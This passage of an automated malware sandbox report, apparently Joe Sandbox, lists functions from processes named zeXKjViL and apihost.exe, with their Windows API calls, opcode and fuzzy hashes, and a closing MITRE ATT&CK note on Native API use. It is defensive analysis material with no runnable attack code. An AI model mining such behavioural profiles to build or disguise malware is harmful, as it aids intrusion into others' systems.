Control-flow Graph

Executed
Not Executed

APIs

VirtualFree.KERNELBASE(?,00000000,00008000), ref: 01085D6D

Memory Dump Source

Source File: 00000022.00000002.1983376643.0000000001084000.00000040.00001000.00020000.00000000.sdmp, Offset: 01084000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_1084000_zeXKjViL.jbxd

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 711040bb3eb8fe1787238b96dadd446917ed0afe7d1f8351bc9c0a7492d63a69
Instruction ID: 7fb2802442e85ba68a79c821b60639db401003de2a25f843d0dfd79fb2c76919
Opcode Fuzzy Hash: 711040bb3eb8fe1787238b96dadd446917ed0afe7d1f8351bc9c0a7492d63a69
Instruction Fuzzy Hash: E2D0922CA4C30099EEFE3E1DED8C73039D52360A20E0C82C0AEC1190A352524C078982

Function 01088371 Relevance: 1.3, APIs: 1, Instructions: 8COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 01088380

Memory Dump Source

Source File: 00000022.00000002.1983376643.0000000001084000.00000040.00001000.00020000.00000000.sdmp, Offset: 01084000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_1084000_zeXKjViL.jbxd

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: 8efbd4d50cd07fb60503ad9452132107a0fd21d41f4ae19f030914a41b32b70c
Instruction ID: f6239f624d12c8e74347b6481ba3e3ac97bfac357c971c3e6bbade72b1e98ce6
Opcode Fuzzy Hash: 8efbd4d50cd07fb60503ad9452132107a0fd21d41f4ae19f030914a41b32b70c
Instruction Fuzzy Hash: 2EB092A1A0E784CEEB622764681D1983BB0A8822C63498097DCC2C6227F21988054A21

Function 0344D5F0 Relevance: .1, Instructions: 75
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000022.00000002.2013345099.000000000344D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0344D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_344d000_zeXKjViL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b168b7ac7129cb2063f2a87525714ada50946bae79f719b0dae7ccb87a0e5584
Instruction ID: d5f4c95af40d94233bf2bed91439881c6ab06cd0faf4ac50882fd525b69846bd
Opcode Fuzzy Hash: b168b7ac7129cb2063f2a87525714ada50946bae79f719b0dae7ccb87a0e5584
Instruction Fuzzy Hash: 6F2106B1904240DFEB05EF14D9C0B2BBF65EB89310F2485BAE8094F36BC336D456CAA5

Function 0344D5EB Relevance: .1, Instructions: 56
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000022.00000002.2013345099.000000000344D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0344D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_344d000_zeXKjViL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b90c45bf349dc2233ec1b6a7f64fdb6126ff75985651e60f21b20b7a1f428906
Instruction ID: 366623c5409a4b6eac78597123d204919b630caf4b6778f7af1cc8022f90a873
Opcode Fuzzy Hash: b90c45bf349dc2233ec1b6a7f64fdb6126ff75985651e60f21b20b7a1f428906
Instruction Fuzzy Hash: 6C119D76904280CFDB16DF14D5C4B16BF61FB85314F28C5AAD8490B266C336D45ACBA1

Function 0344D006 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.2013345099.000000000344D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0344D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_344d000_zeXKjViL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 816f9e9675384c9bb54965ea67bfebd208f9785bd2f752ea85ca72c0c9b18312
Instruction ID: b8a7cb930d990d3f6318973ab85d71f5f6274f0074f1128f751aefe35a6183d0
Opcode Fuzzy Hash: 816f9e9675384c9bb54965ea67bfebd208f9785bd2f752ea85ca72c0c9b18312
Instruction Fuzzy Hash: 3C01047140E3C05ED7128B25C894752BFB4EF53224F1D85DBD9848F297C2795849C776

Function 0344D01D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.2013345099.000000000344D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0344D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_344d000_zeXKjViL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4728f1a9c1da6c347963d2d0609f32b01f9bfe9a196cff0ecb186c8f3adf509b
Instruction ID: 0451ef022df2ed92795926aef56a655ebb388bf8aae2e4b1d4a367d445790662
Opcode Fuzzy Hash: 4728f1a9c1da6c347963d2d0609f32b01f9bfe9a196cff0ecb186c8f3adf509b
Instruction Fuzzy Hash: 8401DF718093009AF7208A29CD84B67BF98EF42328F0CC57BEC180F287C2799846C6B5

Non-executed Functions

Function 010ACBD0 Relevance: 21.4, APIs: 10, Strings: 2, Instructions: 418COMMON

Download Yara Rule

Strings

w, xrefs: 010AC289
d, xrefs: 010AC294

Memory Dump Source

Source File: 00000022.00000002.1983376643.0000000001084000.00000040.00001000.00020000.00000000.sdmp, Offset: 01084000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_1084000_zeXKjViL.jbxd

Similarity

API ID:
String ID: d$w
API String ID: 0-2400632791
Opcode ID: 79c2c8e566fd5401378d08b07d8d9b33f9704efa08524d2202d7d52e6b7a7c15
Instruction ID: fab9169da52b176ea878b941868e83bd17176fd1efb43ee6e780ea34f7906237
Opcode Fuzzy Hash: 79c2c8e566fd5401378d08b07d8d9b33f9704efa08524d2202d7d52e6b7a7c15
Instruction Fuzzy Hash: 93C12635A08384AEFEF786EC4F18B793EE46B42660FCF41C5F7D68A0A3D62558049652

Analysis Process: apihost.exePID: 7484, Parent PID: 3448COMMON

Execution Graph

Execution Coverage:	10.7%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	453
Total number of Limit Nodes:	46

Executed Functions

Function 02E8F6BA Relevance: 6.1, APIs: 4, Instructions: 130
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 02E8F73E
GetCurrentThread.KERNEL32 ref: 02E8F77B
GetCurrentProcess.KERNEL32 ref: 02E8F7B8
GetCurrentThreadId.KERNEL32 ref: 02E8F811

Memory Dump Source

Source File: 00000023.00000002.2959933543.0000000002E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_2e80000_apihost.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 19ae578ce835256af1c039356e4c4ba3868d6d69d5944306956a039fe2699ef8
Instruction ID: 47622c50cba6e86c2c7279e042a06b2a1c5dc09f453806d21eff52790fb607de
Opcode Fuzzy Hash: 19ae578ce835256af1c039356e4c4ba3868d6d69d5944306956a039fe2699ef8
Instruction Fuzzy Hash: 3A5163B09102498FDB14DFAAD549B9EBBF1EB48318F20C059E05CA7360DB74A884CF65

Function 02E8F6C0 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 02E8F73E
GetCurrentThread.KERNEL32 ref: 02E8F77B
GetCurrentProcess.KERNEL32 ref: 02E8F7B8
GetCurrentThreadId.KERNEL32 ref: 02E8F811

Memory Dump Source

Source File: 00000023.00000002.2959933543.0000000002E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_2e80000_apihost.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 1baa6f7e351bdf9e9d22dcbd1e03fc52764ff14e37afee044cdc16b7a6e30c89
Instruction ID: f8683450b30d8b0a59b76b3945bed402bacf468c1211e0eaff1bd567283cfd70
Opcode Fuzzy Hash: 1baa6f7e351bdf9e9d22dcbd1e03fc52764ff14e37afee044cdc16b7a6e30c89
Instruction Fuzzy Hash: 165163B09102498FDB14DFAAD549B9EBBF1EF48318F20C059E058A7360DB74A884CF65

Function 0645F99F Relevance: 4.6, APIs: 3, Instructions: 97
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?,?,?,?,0645F8C2,?,?,?,?,?), ref: 0645F967
GetSystemMetrics.USER32(00000031), ref: 0645F9FE
GetSystemMetrics.USER32(00000032), ref: 0645FA38

Memory Dump Source

Source File: 00000023.00000002.2982246712.0000000006450000.00000040.00000800.00020000.00000000.sdmp, Offset: 06450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6450000_apihost.jbxd

Similarity

API ID: MetricsSystem$CreateFromIconResource
String ID:
API String ID: 3002642008-0
Opcode ID: 94dffaca5eca65bbccbd03dffbd8d7c0f950701b4c84e59e8a153a502e500407
Instruction ID: 1c98715d21fe1740b42b6ecfe8ab2774bb3ce43650c1f8371627fedfdcbcb730
Opcode Fuzzy Hash: 94dffaca5eca65bbccbd03dffbd8d7c0f950701b4c84e59e8a153a502e500407
Instruction Fuzzy Hash: 454156B1800348CFDB51CF99D4497DEBFF4EB49314F25845AE558AB261C3789988CFA2

Function 064516C0 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 157
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

KiUserCallbackDispatcher.NTDLL(00000037,00000000,00000000,03FF4164,0309FF60,?,00000000,?,00000000,00000000), ref: 06451877

Strings

Hbq, xrefs: 06451760

Memory Dump Source

Source File: 00000023.00000002.2982246712.0000000006450000.00000040.00000800.00020000.00000000.sdmp, Offset: 06450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6450000_apihost.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID: Hbq
API String ID: 2492992576-1245868
Opcode ID: 8e3267b983061757199910d3b5271faad246d13a499ddab798c8fae93bf8dfa4
Instruction ID: a01e0388c1e417e76866b150bf92986a9d24e30f651c0cbab080bd199d2f9d9c
Opcode Fuzzy Hash: 8e3267b983061757199910d3b5271faad246d13a499ddab798c8fae93bf8dfa4
Instruction Fuzzy Hash: 5A517A347406108FD759AB29C464B2E77ABEFC4B50F16846AE80ACB7A1CF74DD02CB94

Function 02E8D418 Relevance: 1.7, APIs: 1, Instructions: 201
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 02E8D67E

Memory Dump Source

Source File: 00000023.00000002.2959933543.0000000002E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_2e80000_apihost.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 4429e0a381b17fa90bdd03a330ad6bcbdaad9c492eb3eadc8a049d3e0235329b
Instruction ID: 9b1cd380a929ba8e5184969b2b861aa32bdaa8345d8033d7e94a2a2d0b85b9c0
Opcode Fuzzy Hash: 4429e0a381b17fa90bdd03a330ad6bcbdaad9c492eb3eadc8a049d3e0235329b
Instruction Fuzzy Hash: A3813570A00B449FD724EF39D450B9ABBF1FF48318F108A2ED48A97A50D775E849CB90

Function 06453E64 Relevance: 1.6, APIs: 1, Instructions: 115
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06453F82

Memory Dump Source

Source File: 00000023.00000002.2982246712.0000000006450000.00000040.00000800.00020000.00000000.sdmp, Offset: 06450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6450000_apihost.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: c294ef0f5f6160c0110fd198c968aca5103987faf1a05bcee23d4db25ac3f301
Instruction ID: e6ea747c5cb902dcb1fae17465e78a6e534e073377a1f8e0407806f6b357f4bb
Opcode Fuzzy Hash: c294ef0f5f6160c0110fd198c968aca5103987faf1a05bcee23d4db25ac3f301
Instruction Fuzzy Hash: 9651EDB1D003499FDF15CFA9C884ADEBBB2FF48354F25812AE818AB211D7749885CF90

Function 06453E70 Relevance: 1.6, APIs: 1, Instructions: 113
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06453F82

Memory Dump Source

Source File: 00000023.00000002.2982246712.0000000006450000.00000040.00000800.00020000.00000000.sdmp, Offset: 06450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6450000_apihost.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: f7ab6b518b2961a1bfca7f12fa2e96cc286175e7f6706ee6723e1585897da5a9
Instruction ID: 71f31b72eb7698fbe93bcc9fc499135a53a26d89c6e81bf8c8f2c62b15672a72
Opcode Fuzzy Hash: f7ab6b518b2961a1bfca7f12fa2e96cc286175e7f6706ee6723e1585897da5a9
Instruction Fuzzy Hash: A141C0B1D003499FDB15CF99C884ADEFBB5FF48354F25812AE819AB211D7719885CF90

Function 06451C94 Relevance: 1.6, APIs: 1, Instructions: 97
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 06456671

Memory Dump Source

Source File: 00000023.00000002.2982246712.0000000006450000.00000040.00000800.00020000.00000000.sdmp, Offset: 06450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6450000_apihost.jbxd

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: eeca9a08149fcecbffa4b874bf9634459d390647866bfcf4143eca5a53b5aa57
Instruction ID: ddb22cad54b92ff79360b19f3e811ff88d9663b388f24e5e96e318f9234ad729
Opcode Fuzzy Hash: eeca9a08149fcecbffa4b874bf9634459d390647866bfcf4143eca5a53b5aa57
Instruction Fuzzy Hash: D64127B4900305CFCB54CF99C488AAABBF5FB88314F26C459E919AB321D730A841CFA0

Function 0645F8A8 Relevance: 1.6, APIs: 1, Instructions: 84
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000023.00000002.2982246712.0000000006450000.00000040.00000800.00020000.00000000.sdmp, Offset: 06450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6450000_apihost.jbxd

Similarity

API ID: CreateFromIconResource
String ID:
API String ID: 3668623891-0
Opcode ID: 5f6138f61922df7a7ec779cb9827abdfe3d3839a50a47604e512da4ae06ac90f
Instruction ID: 3c60a9ce1d01c198836aa571fb3c85631612c51aa23b7730698a7af189032790
Opcode Fuzzy Hash: 5f6138f61922df7a7ec779cb9827abdfe3d3839a50a47604e512da4ae06ac90f
Instruction Fuzzy Hash: F03169729042599FCB51DFAAD840ADEBFF8EF09310F15805AE954AB222C3359854DFA2

Function 02E8FD0A Relevance: 1.6, APIs: 1, Instructions: 64
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02E8FD97

Memory Dump Source

Source File: 00000023.00000002.2959933543.0000000002E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_2e80000_apihost.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: f10a2dc083711be6911c95faacae61892f5a57e2a1ad056e5d554db03e342cea
Instruction ID: 306ef1e648c3c5695e70e1fe9994af0e29c05ce76e35cb9231d3069cb4c45689
Opcode Fuzzy Hash: f10a2dc083711be6911c95faacae61892f5a57e2a1ad056e5d554db03e342cea
Instruction Fuzzy Hash: 6721C6B5D00258AFDB10CF9AD984ADEBFF4EB48324F14841AE958A7350D378A944CFA5

Function 02E8FD10 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02E8FD97

Memory Dump Source

Source File: 00000023.00000002.2959933543.0000000002E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_2e80000_apihost.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 232ae31fc4c6bbe053c0e6f3405d67599ca03e85e1b2634fd15787a9491e265d
Instruction ID: 2348f33b50ebc90459d420a5be02120bd0e58f50e6913e6ef91e377a087890ea
Opcode Fuzzy Hash: 232ae31fc4c6bbe053c0e6f3405d67599ca03e85e1b2634fd15787a9491e265d
Instruction Fuzzy Hash: D421C4B5D002589FDB10CFAAD584ADEBFF4EB48324F14841AE958A7350D374A944CFA5

Function 0645E41C Relevance: 1.6, APIs: 1, Instructions: 56windowCOMMON

Download Yara Rule

APIs

CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?,?,?,?,0645F8C2,?,?,?,?,?), ref: 0645F967

Memory Dump Source

Source File: 00000023.00000002.2982246712.0000000006450000.00000040.00000800.00020000.00000000.sdmp, Offset: 06450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6450000_apihost.jbxd

Similarity

API ID: CreateFromIconResource
String ID:
API String ID: 3668623891-0
Opcode ID: 4dd92acac8ac15021c49f798f7c818784f0b197bd5b1a25426f62085318fce17
Instruction ID: 3ffa6026c23bd54ea95fce1621e0c5f042f554cfc3e016c7fe2ae1a2430b907a
Opcode Fuzzy Hash: 4dd92acac8ac15021c49f798f7c818784f0b197bd5b1a25426f62085318fce17
Instruction Fuzzy Hash: 171126B1900359DFDB50CFAAD844BDEBFF8EB48320F14841AE954A7211C375A954CFA5

Function 0645D520 Relevance: 1.6, APIs: 1, Instructions: 56COMMON

Download Yara Rule

APIs

SetWindowTextW.USER32(?,00000000), ref: 0645D592

Memory Dump Source

Source File: 00000023.00000002.2982246712.0000000006450000.00000040.00000800.00020000.00000000.sdmp, Offset: 06450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6450000_apihost.jbxd

Similarity

API ID: TextWindow
String ID:
API String ID: 530164218-0
Opcode ID: 213078c14705284c9ea671e30e898e1030331d4e3c5bcc72cb73f415c478abc5
Instruction ID: d4619075ce5b9fc19c08b7a57202c044b0953d24a2f0fae38823744b378ca09f
Opcode Fuzzy Hash: 213078c14705284c9ea671e30e898e1030331d4e3c5bcc72cb73f415c478abc5
Instruction Fuzzy Hash: 822133B2D002498FCB14CF9AC444BDEFBF4EF88324F10802AE868A7251D338A545CFA5

Function 0645D528 Relevance: 1.6, APIs: 1, Instructions: 53COMMON

Download Yara Rule

APIs

SetWindowTextW.USER32(?,00000000), ref: 0645D592

Memory Dump Source

Source File: 00000023.00000002.2982246712.0000000006450000.00000040.00000800.00020000.00000000.sdmp, Offset: 06450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6450000_apihost.jbxd

Similarity

API ID: TextWindow
String ID:
API String ID: 530164218-0
Opcode ID: fa7269b100d2e082f46117b7300787c6fe112adfcaaec2fede29fda90c774121
Instruction ID: bc48690a3581d13d10943408a30db5465d81128cda707beef0fbd8ef7f50ab40
Opcode Fuzzy Hash: fa7269b100d2e082f46117b7300787c6fe112adfcaaec2fede29fda90c774121
Instruction Fuzzy Hash: 7211E2B6D002498FDB14CF9AC844BDEFBF4EF88324F15842AD868A7251D378A545CFA5

Function 0645E460 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,?,?,?,?,?,?,?,00000000,?,?), ref: 0645FCCD

Memory Dump Source

Source File: 00000023.00000002.2982246712.0000000006450000.00000040.00000800.00020000.00000000.sdmp, Offset: 06450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6450000_apihost.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 1a0c21e3be2280d6f2992f11dbdba482ccc04a8ff094f8a127fcdd7d913d6c92
Instruction ID: b9c5741137a93d2ab4eae780a1b38ef7e50b47b8d206c3b14b028decad6028a6
Opcode Fuzzy Hash: 1a0c21e3be2280d6f2992f11dbdba482ccc04a8ff094f8a127fcdd7d913d6c92
Instruction Fuzzy Hash: A51125B5800348DFCB50DF99C448BDEBBF8FB48320F10841AE918A7200C374A944CFA5

Function 064540B1 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,FFFFFFF4,?), ref: 06454115

Memory Dump Source

Source File: 00000023.00000002.2982246712.0000000006450000.00000040.00000800.00020000.00000000.sdmp, Offset: 06450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6450000_apihost.jbxd

Similarity

API ID: LongWindow
String ID:
API String ID: 1378638983-0
Opcode ID: 7d32c60069c542d896ccd0c426192d5365abd51aedacc6b98a973252e6d24fce
Instruction ID: 91af6a99d2dc8050ca4d4bc139a48b7734dd967f4420e6f3f637b74799f665b7
Opcode Fuzzy Hash: 7d32c60069c542d896ccd0c426192d5365abd51aedacc6b98a973252e6d24fce
Instruction Fuzzy Hash: 831106B58002499FDB10DF9AD989BDEBBF8EB48324F10841AE954A7741C374A944CFA5

Function 06451B7C Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,FFFFFFF4,?), ref: 06454115

Memory Dump Source

Source File: 00000023.00000002.2982246712.0000000006450000.00000040.00000800.00020000.00000000.sdmp, Offset: 06450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6450000_apihost.jbxd

Similarity

API ID: LongWindow
String ID:
API String ID: 1378638983-0
Opcode ID: f8b6cebf9f56f37a8e462f2a032d63ec73014ae34126dc933f4cbf8b0002a45c
Instruction ID: 50355eacd15b6ccec0ce34fbe75b4246e02330da00c08d85d9f061d9a0eb7f2d
Opcode Fuzzy Hash: f8b6cebf9f56f37a8e462f2a032d63ec73014ae34126dc933f4cbf8b0002a45c
Instruction Fuzzy Hash: 521106B5800248DFDB10DF9AD589BDEBBF8EB48324F10841AE958A7301D375A944CFA5

Function 02E8D618 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 02E8D67E

Memory Dump Source

Source File: 00000023.00000002.2959933543.0000000002E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_2e80000_apihost.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: d1a319269fb41a5faeaeed3f90dd244728b977e4c8d079e8b1d6863c7b19e1fa
Instruction ID: 1f67e72cf70d75fcceec7bdc854e2f13158494a1e770e73298de09d23782b9c1
Opcode Fuzzy Hash: d1a319269fb41a5faeaeed3f90dd244728b977e4c8d079e8b1d6863c7b19e1fa
Instruction Fuzzy Hash: 9F11DFB5D002498FCB10DFAAD844ADEFBF4EF88228F10846AD469A7250C379A545CFA5

Function 0645FC69 Relevance: 1.5, APIs: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,?,?,?,?,?,?,?,00000000,?,?), ref: 0645FCCD

Memory Dump Source

Source File: 00000023.00000002.2982246712.0000000006450000.00000040.00000800.00020000.00000000.sdmp, Offset: 06450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6450000_apihost.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 3687779210caa6b3eb9edf14fb44cfd053b6b963c401334d6e9d0f82d609b99b
Instruction ID: 77ea4418865bb2e771d2d358475bccc63c767a3369203c7d55b605f31652ff19
Opcode Fuzzy Hash: 3687779210caa6b3eb9edf14fb44cfd053b6b963c401334d6e9d0f82d609b99b
Instruction Fuzzy Hash: 571106B5800259CFCB11CF99D585BDEBBF8FB08324F10841AE958A7240C374A544CFA5

Function 064C21B0 Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 064C319D

Memory Dump Source

Source File: 00000023.00000002.2983677734.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_64c0000_apihost.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 491a8b5b26b0b2555e00d8f70a5fb45e172337ad621caec77d4a947511d9bb1e
Instruction ID: 4fb762b791f484054b7214638c0a19c88e3411ea72f2b9ea0f53296ff8f5f162
Opcode Fuzzy Hash: 491a8b5b26b0b2555e00d8f70a5fb45e172337ad621caec77d4a947511d9bb1e
Instruction Fuzzy Hash: F711FEB59002488FCB60DF9AD549B9EBBF4EB48224F20845AE519A7310C775A944CFA5

Function 064C3141 Relevance: 1.5, APIs: 1, Instructions: 45comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 064C319D

Memory Dump Source

Source File: 00000023.00000002.2983677734.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_64c0000_apihost.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: fc7c387dffeac78d33a4a12d7052399323d5c2cf5e95209251f00dcc475f1371
Instruction ID: 050bf2fed8b321693a922a6b7c97067692a4ec60dfea0f187583fd10f8ad1d8d
Opcode Fuzzy Hash: fc7c387dffeac78d33a4a12d7052399323d5c2cf5e95209251f00dcc475f1371
Instruction Fuzzy Hash: 841112B5D002588FCB60DF99D589BDEBFF4EB08324F24845AD559A7310C778A944CFA4

Function 02DBD01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.2957282116.0000000002DBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DBD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_2dbd000_apihost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b40bc155476c783abe16bade407085d2520815988e2c89ca282a5b5d925e1eca
Instruction ID: dad9345cfd2ef5f21d7ef5aaa000d57a232828395c81bbcb99c5037c15ad8922
Opcode Fuzzy Hash: b40bc155476c783abe16bade407085d2520815988e2c89ca282a5b5d925e1eca
Instruction Fuzzy Hash: CA212F71604200DFDB16DF24D994B66BFA6EF88314F30C5A9E84A4B396C33AD847CA61

Function 02DBD005 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.2957282116.0000000002DBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DBD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_2dbd000_apihost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c42245088077fe76f22c7346d8a6e54441c4f8338abbedcb3a3a7c12f78c7054
Instruction ID: e4bbf03e80901c0e43aeb95aa0397c971d5091e4066f6e38ab2819c16aa85c33
Opcode Fuzzy Hash: c42245088077fe76f22c7346d8a6e54441c4f8338abbedcb3a3a7c12f78c7054
Instruction Fuzzy Hash: B5217F75509380CFCB03CF24D594755BF72EF46214F28C5DAD8498B2A7C33A980ACB62

Function 02DAD07D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.2956707395.0000000002DAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DAD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_2dad000_apihost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4dfd2e401286def5e5ead400985b79a03394cc6e8e7a495061da5fe17845ee95
Instruction ID: a11ed87ab853833eb27783876a530a471c189aef2c6c664f12654d28807b17a4
Opcode Fuzzy Hash: 4dfd2e401286def5e5ead400985b79a03394cc6e8e7a495061da5fe17845ee95
Instruction Fuzzy Hash: B701F2310083409EE7209A29CD94F67BF99EF41724F28C42AED580A786C779DC41CA75

Function 02DAD07C Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.2956707395.0000000002DAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DAD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_2dad000_apihost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f1249f9f55cf61db90633e93e2aacf85741777b0d52296d6cc3113aee86231f8
Instruction ID: e9e492f7fc2acdd70caf2944b45db3c0444fda5861942abe06b000fc150dbf0b
Opcode Fuzzy Hash: f1249f9f55cf61db90633e93e2aacf85741777b0d52296d6cc3113aee86231f8
Instruction Fuzzy Hash: 3BF062714043449EE7108A16D884B62FFA8EF41674F28C45AED585A686C3799C45CA75

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
